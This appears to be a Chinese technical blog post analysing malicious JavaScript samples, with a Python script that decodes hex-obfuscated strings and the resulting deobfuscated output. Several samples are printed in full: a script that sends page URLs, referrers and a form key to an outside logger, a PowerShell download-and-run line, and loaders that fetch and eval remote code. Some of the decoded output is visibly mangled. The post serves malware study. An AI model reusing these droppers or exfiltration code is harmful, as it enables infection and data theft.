Virus_JS3_PyAnalysisAndSummary

最新推荐文章于 2022-04-22 01:59:34 发布
最新推荐文章于 2022-04-22 01:59:34 发布
阅读量495 收藏
点赞数
分类专栏: 工具学习 文章标签: javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahoo110/article/details/77961333
版权

本篇是对JS样本做的简单分析第三篇,有点重复的意思,当巩固吧.

0x1 Sample(TotalSamp_myself\Js–166x–63)

var _0x586f=["\x76\x61\x6C\x75\x65","\x78\x4B\x65\x79\x78","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x55\x52\x4C","\x26","\x26\x61\x6D\x70\x3B","\x72\x65\x70\x6C\x61\x63\x65","\x6B","\x72\x65\x66\x65\x72\x72\x65\x72","\x64\x6F\x63\x75\x6D\x65\x6E\x74","\x65\x72\x72","\x50\x4F\x53\x54","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6F\x67\x67\x65\x72\x2E\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x4C\x6F\x67\x67\x65\x72\x2E\x61\x73\x6D\x78","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x74\x65\x78\x74\x2F\x78\x6D\x6C","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x75\x74\x66\x2D\x38\x22\x20\x3F\x3E","\x3C\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x69\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x2D\x69\x6E\x73\x74\x61\x6E\x63\x65\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x64\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x73\x6F\x61\x70\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x78\x6D\x6C\x73\x6F\x61\x70\x2E\x6F\x72\x67\x2F\x73\x6F\x61\x70\x2F\x65\x6E\x76\x65\x6C\x6F\x70\x65\x2F\x22\x3E","\x3C\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x4C\x6F\x67\x44\x61\x74\x61\x20\x78\x6D\x6C\x6E\x73\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x22\x3E","\x3C\x6B\x3E","\x3C\x2F\x6B\x3E","\x3C\x75\x72\x6C\x3E","\x64\x6F\x6D\x61\x69\x6E","\x3C\x2F\x75\x72\x6C\x3E","\x3C\x65\x76\x3E","\x3C\x2F\x65\x76\x3E","\x3C\x2F\x4C\x6F\x67\x44\x61\x74\x61\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x3E","\x73\x65\x6E\x64","","\x22\x2C","\x22","\x44\x4F\x4D\x50\x61\x72\x73\x65\x72","\x70\x61\x72\x73\x65\x46\x72\x6F\x6D\x53\x74\x72\x69\x6E\x67","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x44\x4F\x4D","\x61\x73\x79\x6E\x63","\x6C\x6F\x61\x64\x58\x4D\x4C","\x6E\x6F\x64\x65\x56\x61\x6C\x75\x65","\x63\x68\x69\x6C\x64\x4E\x6F\x64\x65\x73","\x4C\x6F\x67\x44\x61\x74\x61\x52\x65\x73\x75\x6C\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x20\x6E\x6F\x74\x20\x73\x75\x70\x70\x6F\x72\x74\x65\x64"];
var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];var visitorData= new visitorData(k);function visitorData(_0xf4c7x3){this[_0x586f[3]]=document[_0x586f[3]][_0x586f[6]](_0x586f[4],_0x586f[5]);this[_0x586f[7]]=_0xf4c7x3;try{this[_0x586f[8]]=top[_0x586f[9]][_0x586f[8]][_0x586f[6]](_0x586f[4],_0x586f[5]);} catch(err){this[_0x586f[8]]=_0x586f[10];} ;var _0xf4c7x4=CreateXMLHttpRequest();_0xf4c7x4[_0x586f[13]](_0x586f[11],_0x586f[12],true);_0xf4c7x4[_0x586f[16]](_0x586f[14],_0x586f[15]);var _0xf4c7x5=_0x586f[17]+_0x586f[18]+_0x586f[19]+_0x586f[20]+_0x586f[21]+_0xf4c7x3+_0x586f[22]+_0x586f[23]+document[_0x586f[24]]+_0x586f[25]+_0x586f[26]+objToString(this)+_0x586f[27]+_0x586f[28]+_0x586f[29]+_0x586f[30];_0xf4c7x4[_0x586f[31]](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8=_0x586f[32];try{_0xf4c7x8+=_0xf4c7x7[_0x586f[3]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[7]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[8]].toString()+_0x586f[33];} catch(err){_0xf4c7x8=_0xf4c7x7[_0x586f[3]].toString();} ;return _0xf4c7x8;} ;function parseResponse(_0xf4c7xa){if(window[_0x586f[35]]){parser= new DOMParser();xmlDoc=parser[_0x586f[36]](_0xf4c7xa,_0x586f[15]);} else {xmlDoc= new ActiveXObject(_0x586f[37]);xmlDoc[_0x586f[38]]=false;xmlDoc[_0x586f[39]](_0xf4c7xa);} ;return xmlDoc[_0x586f[43]](_0x586f[42])[0][_0x586f[41]][0][_0x586f[40]];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!=_0x586f[44]){return  new XMLHttpRequest();} else {if( typeof ActiveXObject!=_0x586f[44]){return  new ActiveXObject(_0x586f[45]);} else {throw  new Error(_0x586f[46]);} ;} ;} ;

0x2 py脚本

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

' a test module ahoo'

__author__ = 'ahoo'

import sys
import io
import os
import codecs
import re
import shutil

PutPath = '063.JS.vir'          #JsVirus文件
OutPath = '63_analysis.txt'     #提取到的文件

myJslog = []

AuthorSign = True
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码 


def ReadLogFile(InPath,ReadTye = 'r'):
    logall = []
    #print(InPath)
    if os.path.exists(InPath):
        f = codecs.open(InPath,ReadTye,'utf-8')
        #读入到list
        for line in f:
            if None == line:
                pass
            else:
                logall.append(line)

        f.close()
    return logall



def WriteResultFile(OutRePath,findRe= [],WriteTye = 'a+'):      #后面可能改成词典
    #if os.path.exists(InPath):
    #   pass
    #else:
    #要用全局变量把这里变成只写一次吗
    global AuthorSign
    f = codecs.open(OutRePath,WriteTye,'utf-8')
    if AuthorSign == True:
        f.write('\n*****************************************************\r\n')
        f.write('*              ahoo JsVirusAnalysis                        ')
        f.write('\n***************************************************\r\n\n')
        AuthorSign = False
    for i in findRe:
        f.write(i + '\n')
    f.close()
    return True


def JSVirus_Parse():

    #1.读取文件到LineList
    myJslog = ReadLogFile(PutPath)
    #print(myJslog)

    writeList_temp = []
    writeList = []

    #2.分为两部分处理.
    f586List = []
    pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')
    for line in myJslog:
        if '_0x586f=["' in line:
            #2.1 替换16进制--
            for i in pattern_ascii.findall(line):
                #方法1
                #line = line.replace(i[0], chr(int(i[1],16)))
                #方法2
                pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])')
                line = pattern_temp.sub(chr(int(i[1],16)),line,count =1)

            print(line)
            writeList.append(line)

            #2.2 分割为数组
            #line13 = 'var _0x586f=["value","xKeyx","getElementById","URL","&","&amp"];'
            #re.match(r"\[(.*)\]",line13[12:]).group(1)

            f586List = re.match(r"\[(.*)\]",line[12:]).group(1).split(',')
            print(f586List)
        else:
            writeList_temp.append(line)

    #3.替换数组
    #3.1查找所有数组
    ''' for test
    line11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];"
    print(line11)
    pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')
    for arrary  in  re.findall('_0x586f\s*\[(\d{1,3})]',line11):
        index = int(arrary)
        repStr = "*haha*"
        line11 = pattern_arrary.sub(repStr,line11,count=1)

    print(line11)
    '''
    for line in writeList_temp:
        pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')
        for arrary  in  re.findall('_0x586f\s*\[(\d{1,3})]',line):
            index   = int(arrary)
            repStr  = f586List[index]
            line    = pattern_arrary.sub(repStr,line,count=1)
            #3.2替换分割的字符串+
            plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"') 
            line = plus.sub('',line)
    writeList.append(line)  

    #4 写入并打开文件
    WriteResultFile(OutPath,writeList)
    os.system('notepad.exe ' + OutPath)





    print('The Virus has been analyzed,there is my advice! Thanks!')
    return True

if __name__ == '__main__':
    JSVirus_Parse()

0x3 输出结果

做过美容的.
var _0x586f=["value","xKeyx","getElementById","URL","&","&amp;","replace","k","referrer","document","err","POST","http://logger.ysabel.eu/Logger.asmx","open","Content-Type","text/xml","setRequestHeader","<?xml version="1.0" encoding="utf-8" ?>","<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">","<soap:Body>","<LogData xmlns="http://ysabel.eu/">","<k>","</k>","<url>","domain","</url>","<ev>","</ev>","</LogData>","</soap:Body>","</soap:Envelope>","send","","",",""","DOMParser","parseFromString","Microsoft.XMLDOM","async","loadXML","nodeValue","childNodes","LogDataResult","getElementsByTagName","undefined","Microsoft.XMLHTTP","XMLHttpRequest not supported"];

var k = document["getElementById"]("xKeyx")["value"];
var visitorData = new visitorData(k);

function visitorData(_0xf4c7x3) {
        this["URL"] = document["URL"]["replace"]("&", "&amp;");
        this["k"] = _0xf4c7x3;
        try {
            this["referrer"] = top["document"]["referrer"]["replace"]("&", "&amp;");
        } catch (err) {
            this["referrer"] = "err";
        };
        var _0xf4c7x4 = CreateXMLHttpRequest();
        _0xf4c7x4["open"]("POST", "http://logger.ysabel.eu/Logger.asmx", true);
        _0xf4c7x4["setRequestHeader"]("Content-Type", "text/xml");
        var _0xf4c7x5 = "<?xml version=" 1.0 " encoding="utf - 8 " ?><soap:Envelope xmlns:xsi="http: //www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/<soap:Body><LogData xmlns="http://ysabel.eu/<k>"+_0xf4c7x3+"</k><url>"+document["domain</url><ev>"+objToString(this)+"</ev></LogData></soap:Body></soap:Envelope>";_0xf4c7x4["send"](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8="";try{_0xf4c7x8+=_0xf4c7x7["URL"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["k"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["referrer"].toString()+"";} catch(err){_0xf4c7x8=_0xf4c7x7["URL"].toString();} ;return _0xf4c7x8;} ;function parseResponse(_0xf4c7xa){if(window["""]){parser= new DOMParser();xmlDoc=parser["DOMParser"](_0xf4c7xa,"text/xml");} else {xmlDoc= new ActiveXObject("parseFromString");xmlDoc["Microsoft.XMLDOM"]=false;xmlDoc["async"](_0xf4c7xa);} ;return xmlDoc["LogDataResult"]("childNodes")[0]["nodeValue"][0]["loadXML"];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!="getElementsByTagName"){return  new XMLHttpRequest();} else {if( typeof ActiveXObject!="getElementsByTagName"){return  new ActiveXObject("undefined");} else {throw  new Error("Microsoft.XMLHTTP");} ;} ;} ;

0x4 注意

[1]生成代码后做个美容(格式化)
http://www.css88.com/tool/js_beautify/
[2]正则测试工具(F:\RegTestTool.exe)

0x5下面做点扩充吧,js的都往后续…

0x5.1 Num25

var d=new ActiveXObject('Shell.TrimiApplication'.replace('Trimi',''));
d.ShellExecute("PowerShell","(New-Object System.Net.WebClient).DownloadFile('http://pomf.nyafuu.org/files/hekycc.exe','hajdebabuchajde.pif');Start-Process 'hajdebabuchajde.pif'","","",0);

0x5.2 Num41

var m = "rZJ-8RCo-l6L4KpmDDYk-Djc_A3rIzZDBY0MtnHpZMggmgBiXlxzsG70G_17kBhVkZlNn9wUQQ0"; 
var x = new Array("jaysonandfrisby.com","romiecoston.com"); 
var z1 = "Msxml2.XMLHTTP"; 
var z4 = "a"; 
for (var i=0; i<2; i++) {
    var e = new ActiveXObject(z1); 
    try { 
        e.open("GET", "http://"+x[i]+"/counter/?"+m, false);        e.send(); 
        if (e.status == 200) {
            var z3 = e.responseText; 
            var z3 = z3.split(m); 
            var z3 = z3.join(z4); 
            eval(z3); 
            break; }
        ; } 
    catch(e) 
        { };
 };

0x5.3 Num29

0x5.3.1样本
    var random=function(){return Math.random()};
    try{
    var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");
    objHttp.Open("\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x6C\x2D\x70\x68\x64\x7A\x6D\x66\x6A\x68\x2E\x6E\x6C\x2F\x70\x32\x65\x2E\x6A\x73\x3F"+ random(),false);
    objHttp.Send();if(objHttp.Status== 200){
        eval(objHttp.responseText+ "\x64\x6F\x77\x6E\x41\x6E\x64\x45\x78\x65\x63\x28\x22\x70\x67\x36\x76\x22\x29\x3B")}
    }
    catch(e){}
0x5.3.2Py代码
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

' a test module ahoo'

__author__ = 'ahoo'

import sys
import io
import os
import codecs
import re
import shutil

PutPath = '029.JS.vir'          
OutPath = '29_analysis.txt' #提取到的文件.

myJslog = []

AuthorSign = True
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码 


def ReadLogFile(InPath,ReadTye = 'r'):
    logall = []
    #print(InPath)
    if os.path.exists(InPath):
        f = codecs.open(InPath,ReadTye,'utf-8')
        #读入到list
        for line in f:
            if None == line:
                pass
            else:
                logall.append(line)

        f.close()
    return logall



def WriteResultFile(OutRePath,findRe= [],WriteTye = 'a+'):      #后面可能改成词典
    #if os.path.exists(InPath):
    #   pass
    #else:
    #要用全局变量把这里变成只写一次吗
    global AuthorSign
    f = codecs.open(OutRePath,WriteTye,'utf-8')
    if AuthorSign == True:
        f.write('\n*****************************************************\r\n')
        f.write('*              ahoo JsVirusAnalysis                        ')
        f.write('\n***************************************************\r\n\n')
        AuthorSign = False
    for i in findRe:
        f.write(i + '\n')
    f.close()
    return True


def JSVirus_Parse():

    #1.读取文件到LineList
    myJslog = ReadLogFile(PutPath)
    #print(myJslog)

    writeList = []
    pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')
    for line in myJslog:    
        for i in pattern_ascii.findall(line):
            #方法1
            #line = line.replace(i[0], chr(int(i[1],16)))
            #方法2
            pattern_tem = re.compile(r'(\\x[0-9][a-zA-Z0-9])')
            line = pattern_tem.sub(chr(int(i[1],16)),line,count =1)

        print(line)
        writeList.append(line)

    #4 写入并打开文件
    WriteResultFile(OutPath,writeList)
    os.system('notepad.exe ' + OutPath)

    print('The Virus has been analyzed,there is my advice! Thanks!')
    return True

if __name__ == '__main__':
    JSVirus_Parse()
0x5.3.3输出
*****************************************************
*               ahoo JsVirusAnalysis                        
***************************************************

var random=function(){
    return Math.random()};
try{
    var objHttp=WScript.CreateObject("MSXML2.XMLHTTP");
    objHttp.Open("GET","https://dl-phdzmfjh.nl/p2e.js?"+ random(),false);
    objHttp.Send();if(objHttp.Status== 200){
        eval(objHttp.responseText+ "downAndExec("pg6v");")}
}
catch(e){}

0x6 小结

强调一点:复杂的看不懂的先美化,就好找规律多了

【调试】js/vbs(默认调试器vs2013):cmd:WScript.exe /x name.js/vbs
【调试】JS(od-找downhttp):OD载入wscript.exe,调试->参数(jsPaht),ctrl+F2,bp UrlCanonicalizeA/W,F9.
【调试】正则工具: F:\RegTestTool.exe
【代码美化-VB】(http://tools.jb51.net/code/vbscodeformat)
【代码美化-JS】http://www.css88.com/tool/js_beautify/
【VB关键字】executeglobal(str) EXECUTE(str)
【写入法核心】set fso = CreateObject("Scripting.FileSystemObject"):set f = fso.CreateTextFile("C:\VbsVirLog.txt", true):f.Write(str)
【正则】1.替换"+": plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"') ;line = plus.sub('',line)
        2.替换某一行中的所有符合条件
        ''' for test
        line11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];"
        print(line11)
        pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')
        for arrary  in  re.findall('_0x586f\s*\[(\d{1,3})]',line11):
            index = int(arrary)
            repStr = "*haha*"
            line11 = pattern_arrary.sub(repStr,line11,count=1)
        print(line11)
        '''
        3.替换\0x56为char
        '''
        line = 'var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");'
        pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')
        for i in pattern_ascii.findall(line):
            #方法1
            #line = line.replace(i[0], chr(int(i[1],16)))
            #方法2
            pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])')
            line = pattern_temp.sub(chr(int(i[1],16)),line,count =1)
        print(line)
        '''
ahoo110
关注
专栏目录
常见的那些编码和加密
KHOST的博客
08-01 3594
文章目录 一、Image模块 1.1准备工作 1.2打开和显示已有图片(open and show) 1.3创建一张新的简单图片(new) 1.4图片模式的转换(convent) 1.5图像的放缩 1.5.1按尺寸放缩(thumbnail and resize) 1.5.2按像素放缩(eval) 1.6图像的裁剪、粘贴和复制 1.6.1图片的裁剪(crop) 1.6.2图片的粘贴(paste) 1.6.3图片的复制(copy) 1.7图像的融合与复合 1.7.1图像的融合(blend) 1.7.2图像的复合
Virus_JS_BeRevisedAsDownTools
ahoo110的博客
08-13 492
本篇对JS样本做的简单分析,并将该样本改造成快速更换壁纸的工具,也可以用来下载网页.
Virus_JS2_PyAnalysis
ahoo110的博客
09-11 566
本篇是对JS样本做的简单分析第二篇,样本是上次改成设桌面背景的样本(卡饭精睿包2016.12.16.24,可自行下载),原因是这次又需要分析js的,暂时还没拿到样本,就用之前的练手
记一次网站被挂马的处理
mzc186的博客
04-13 502
上线的网站莫名其妙的突然出现ueditor的上传功能不能正常使用,console控制台提示 后台配置项返回格式出错,上传功能将不能正常使用! 日常百度、google发现没有和我的情况比较匹配的,他们出现这种原因多是ueditor的配置问题,但我之前都是可以用的,再用本地的备份代码测试也没问题。 然后查看网络请求,发现图片上传完之后返回的json数据之前还带了下面这段代码: <script...
有趣的JS加密(三)
HumorChen的博客
07-09 598
密文如下:
clean-exe-file-virus-by-Java.rar_java virus_virus_杀毒软件
09-22
标题中的"clean-exe-file-virus-by-Java.rar"表明这是一个使用Java编程语言开发的项目,目的是清除EXE可执行文件中的病毒。描述中提到,这个项目简单地实现了杀毒软件的基本功能,这意味着它可能包括了扫描、检测和...
vb.rar_project ansav vbp_virus_杀毒
09-22
【标题】"vb.rar_project ansav vbp_virus_杀毒" 涉及到的知识点主要集中在VB(Visual Basic)编程语言上,用于开发一个杀毒软件项目。VB是微软公司推出的一种基于事件驱动的编程环境,尤其适合于创建Windows应用...
ISI_isi_virus_zip_
10-02
3. **恶意软件传播策略**:恶意软件通常利用社会工程学,如诱骗邮件或欺诈链接,来诱使用户下载和打开含有病毒的ZIP文件。了解这些策略可以帮助用户提高警惕,避免成为攻击的目标。 4. **防范措施**:为了防止ZIP...
Fx_virus_win32_ramnit_x.zip
07-15
【标题】"Fx_virus_win32_ramnit_x.zip"是一个专门针对Windows操作系统中的"virus.win32.ramnit.x"病毒而设计的专杀工具。该病毒,也被称为Ramnit蠕虫,是一种极具破坏性的恶意软件,它在2010年首次出现,并在互联网...
zhuansha.zip_anti_virus_宏病毒
09-23
【标题】"zhuansha.zip_anti_virus_宏病毒" 涉及到的主要知识点是关于Excel2003宏病毒的防治,以及如何使用宏专杀工具进行安全扫描和清除。宏病毒是一种特殊类型的计算机病毒,它们利用Microsoft Office软件中的宏...
纯js加密简单分析
weixin_44234050的博客
04-22 2050
['sojson.v4']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]( ((['sojson.v4'] + [])["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']['\x61\x70\x70\x6c\x79'](null, "108w111.
Javascript \x 反斜杠x 16进制 编解码
weixin_34324081的博客
11-26 2511
js 里 \x 开头的通常是16进制编码的数据,下面代码实现编解码: 解码 function decode(str){ return str.replace(/\\x(\w{2})/g,function(_,$1){ return String.fromCharCode(parseInt($1,16)) }); } eg. decode('\x5f\x63\x68\x61\x6e\x67\...
js如\x6C\x69\x6E\x65\x63\x68加密代码解压方法
weixin_34376562的博客
10-20 1万+
2019独角兽企业重金招聘Python工程师标准>>> ...
网页文件被加入恶意百度跳转代码\x64\x6f\x63\x75\x6d\x65\x6e\x74 【解密】
A1452585268的博客
01-14 1万+
前几天,用了tp的框架,后来tp被爆出了漏洞,导致网站被植入了时式彩代码。通过百度搜索进入的用户,直接跳转到这个网站里。今天教给大家怎么解密这种采用eval加密的js代码。 恶意代码源码是这样的: &lt;script&gt;if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="关键词...
某段\x 16进制和unicode加密与混淆js代码的解密与反加密
无颠
08-06 1万+
  某天,在鼓捣一个ems系统,想用来做成新闻资讯类网站。弄了好多天,各个框架和结构都差不多了,重新调整了结构,一个偶然的机会,发现搜索框点击的时候不能自动清空先前的内容,于是想添加一段js代码去修改,找了半天,没有看到一个类似main.js的网站通用js代码,倒是发现一个奇怪的js文件,并且是加密的,这肯定引起了我的兴趣哈。看看这段代码。   var _0xe2a1=["\x63\...
\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74解码
热门推荐
qq_42636010的博客
09-02 2万+
这是js代码加密的一种,其实就是用字节代替了字符。 比如说"\x65",由于\x的存在(\x代表这是一个16进制,而一位十六进制代表了四位二进制,所以这里两位十六进制代表了8位二进制,也就是说这代表一个字节),它会被认为是一个十六进制数代表的字符,用utf8解码时代表字符e,解码的过程是,把65从十六进制转为十进制,然后的到一个0-128的数,然后这个数对应英文字符中的一个字符(在utf8中英文字...
在r中读取一个csv,根据virus_name_N和virus_name_X两列,提取任一首字段是Viruses的行
最新发布
06-03
好的,以下是使用R语言的代码实现: 1. 读取csv文件 ```R df ("file.csv") ...3. 将空缺值用NA代替 ```R df[is.na(df)] ``` 这样,你就可以得到提取任一首字段是Viruses的行,并将空缺值用NA代替的结果了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值